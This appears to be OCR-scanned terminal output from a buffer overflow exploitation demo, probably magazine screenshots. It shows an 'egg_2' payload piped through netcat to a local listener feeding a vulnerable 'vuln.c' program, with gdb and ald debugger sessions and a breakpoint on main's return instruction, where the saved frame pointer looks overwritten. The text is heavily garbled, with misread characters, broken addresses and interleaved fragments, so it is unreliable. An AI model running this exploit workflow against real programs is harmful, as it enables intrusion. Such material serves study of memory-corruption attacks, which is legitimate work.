22

&buf=0xbffff9b0

f

haking£> live:/ramdisk/home/haking

[haking@live haking]$ ./egg_2.pg I nc 127.0.0.1 9999 [haking@live haking]$ O

[hakingQlive haking]$ nc -1 -p 9999 I g GNU gdb Red Hat Linux (5.3.90-0.2003071 Copgright 2003 Free Software Foundation GDB is free software, covered bg the GN welcome to change it and/or distribute Tgpe "show copging" to see the conditio There is absolutelg no warrantg for GDB This GDB was configured as "i386-redhat rarg "/1ib/tls/1ibthread_db.so.1".

Breakpoint 1 at 0x80483d6: file vuln.c, &buf=0xbffff9a0

Breakpoint 1, main (argc=2

6    num = read(0,buf

0xbffffaac:    0x40035770

7    pr intf ("num=7,d\n

0xbffffaac:    0xbffffal

[haking01ive haking]$ nc &buf=0xbffff9b0 num=273

, argv=0xbfff ,atoi(argv[ll

num);

haking^live:/ramdisk/home/haking

08048431 E85EFEFFFF 08048436 8D9318FFFFFF 0804843C 8D8B18FFFFFF 08048442 29CH 08048444    31F6

08048446 C1FH02 08048449    39D6

0804844B    730F

Hit <return> to continue.

cali near +0xfffffe5e

lea edx, [ebx+0xffffff181

lea ecx, lebx+0xffffff181

sub edx, ecx

xor esi, esi

sar edx, 0x2

cmp esi, edx

jnc +0xf or <g> to guitg

1 ibc_csu_ 1 ibc_csu_ 1 ibc_csu_ 1 ibc_csu_ 1 ibc_csu_ 1 ibc_csu_ 1 ibc_csu_ 1 ibc_csu_

init+0xl5) init+0xla) init+0x20) init+0x26) init+0x28) init+0x2a) init+0x2d) init+0x2f)

ald> b 0x0804841B

Breakpoint 1 set for 0x0804841B

ald> c

Breakpoint 1 encountered at 0x0804841B

0x00000008 ebx    =    0x40156238    ecx    =    0x40154640    edx    =    0x00000008

esp = 0xBFFFFHBC ebp    =    0x80CD5801    esi    =    0xBFFFFB44    edi    =    0xBFFFFB50

0x0000002B es    =    0x0000002B    fs    =    0x00000000    gs    =    0x00000033

0x0000002B cs    =    0x00000023    eip    =    0x0804841B    eflags = 0x00000286

Flags: PF SF IF

0804841B C3 ald> |

retn

(main+0x6f)